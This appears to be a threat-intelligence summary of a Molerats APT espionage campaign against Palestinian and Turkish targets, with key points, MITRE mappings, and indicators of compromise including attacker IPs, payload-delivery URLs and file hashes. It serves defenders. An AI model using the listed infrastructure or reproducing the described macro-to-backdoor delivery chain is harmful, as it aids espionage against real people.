Threat Research

New espionage attack by Molerats APT targeting users in the Middle East

Securonix

ThreatLabz details a new Molerats APT espionage campaign targeting Middle East actors, delivering a .NET backdoor via macro-enabled Office documents and leveraging Dropbox as the C2 and data-exfiltration channel. The operation shows ties to Spark backdoor activity and Molerats infrastructure, with targets including Palestine’s banking sector, Palestinian political figures, and Turkish journalists, and uses cloud services for command and control.
#MoleratsAPT #SparkBackdoor #DropboxC2 #msupdata #PalestineBanking #TurkeyJournalists

Keypoints

  • Campaign is attributed to Molerats APT based on multiple indicators (packers, C2 methods, geographies, domain reuse).
  • Active since July 2021, with a distribution method shift in December 2021 and minor .NET backdoor changes.
  • Macro-based MS Office documents with Israel/Palestine decoy themes deliver Stage-1 and Stage-2 payloads.
  • .NET backdoor (servicehost.exe) is ConfuserEx packed and masquerades as WinRAR; some samples use Themida packing.
  • C2 and data exfiltration run through Dropbox API (and in some chains Google Drive), with a Dropbox token embedded in the binary.
  • Targets include Palestinian banking sector personnel, Palestinian political figures, human rights activists, and Turkish journalists.
  • Old and new attack chains differ in backdoor delivery and token retrieval (old used justpaste.it; new uses attacker-hosted content).

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Used doc based attachments with VBA macro. Quote: ‘Uses doc based attachments with VBA macro’
  • [T1204.002] User Execution: Malicious File – User opens the document file and enables the VBA macro. Quote: ‘User opens the document file and enables the VBA macro’
  • [T1059.001] Command and Scripting interpreter: PowerShell – VBA macro launches PowerShell to download and execute the payload. Quote: ‘VBA macro launches PowerShell to download and execute the payload’
  • [T1140] Deobfuscate/Decode Files or Information – Strings and other data are obfuscated in the payload. Quote: ‘Strings and other data are obfuscated in the payload’
  • [T1082] System Information Discovery – Sends processor architecture and computer name. Quote: ‘Sends processor architecture and computer name’
  • [T1083] File and Directory Discovery – Upload file from the victim machine. Quote: ‘Upload file from victim machine’
  • [T1005] Data from Local System – Upload file from victim machine. Quote: ‘Upload file from victim machine’
  • [T1567.002] Exfiltration to Cloud Storage – Data is uploaded to Dropbox via api. Quote: ‘Data is uploaded to Dropbox via api’
  • [T1113] Screen capture – The C2 command code “2” corresponds to taking a screenshot and uploading to attacker-controlled Dropbox account. Quote: ‘The C2 command code “2” corresponds to taking a screenshot and uploading to attacker-controlled Dropbox account’

Indicators of Compromise

  • [MD5] – Document/decoy files: 46e03f21a95afa321b88e44e7e399ec3 (15-12.doc) and 5c87b653db4cc731651526f9f0d52dbb (11-12.docx)
  • [MD5] – Additional payloads: 105885d14653932ff6b155d0ed64f926 (report2.dotm)
  • [MD5] – Payloads/executables: ebc98d9c96065c8f1c0f4ce445bf507b (servicehost.exe); c7271b91d190a730864cd149414e8c43 (su.exe); 00d7f155f1a9b29be2c872c6cad40026 (servicehost.exe)
  • [MD5] – RAR payloads: 2dc3ef988adca0ed20650c45735d4160 (cairo hamas office.rar); b9ad53066ab218e40d61b299bd2175ba (details.rar); bd14674edb9634daf221606f395b1e1d (moi.rar); 59368e712e0ac681060780e9caa672a6 (meeting.rar); 99fed519715b3de0af954740a2f4d183 (ministry of the interior 23-9-2021.rar)
  • [Domain] msupdata.com; www.msupdate.com – Domains resolved to Molerats infrastructure (SSL thumbprint overlap noted); www.msupdata.com has passive DNS to Molerats IPs
  • [IP] 45.63.49.202; 23.94.218.221; 185.244.39.165 – IPs used in C2 and hosting infrastructure
  • [URL] drive.google.com/uc?export=download&id=1xwb99Q7duf6q7a-7be44pCk3dU9KwXam – Template download URL for payloads
  • [URL] http://45.63.49.202/document.html; http://23.94.218.221/excelservice.html; http://45.63.49.202/doc.html; http://45.63.49.202/gabha.html – Exfil/payload delivery endpoints
  • [Certificate] SSL thumbprint ec5e468fbf2483cab74d13e5ff6791522fa1081b – Historical certificates linked to Molerats infrastructure

Read more: https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east